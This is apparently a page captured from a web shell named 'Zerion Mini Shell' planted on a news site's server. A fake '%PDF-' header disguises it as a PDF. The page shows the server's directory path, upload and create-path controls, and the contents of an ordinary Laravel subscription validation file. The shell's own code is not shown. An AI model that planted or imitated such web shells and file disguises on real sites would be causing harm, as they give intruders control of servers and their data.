%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/news/app/Http/Requests/Subscription/
Upload File :
Create Path :
Current File : /var/www/html/news/app/Http/Requests/Subscription/SubscriptionUpdateRequest.php

<?php

namespace App\Http\Requests\Subscription;

use App\Http\Requests\BaseRequest;

class SubscriptionUpdateRequest extends BaseRequest
{
    /**
     * Determine if the user is authorized to make this request.
     *
     * @return bool
     */
    public function authorize()
    {
        return true;
    }

    /**
     * Get the validation rules that apply to the request.
     *
     * @return array
     */
    public function rules()
    {
        return [
            'email' => 'required|email:exists:subscriptions,email',
            'token' => 'required|string:exists:subscriptions,token',
        ];
    }

    public function getSanitationRules()
    {
        return [];
    }

}

Zerion Mini Shell 1.0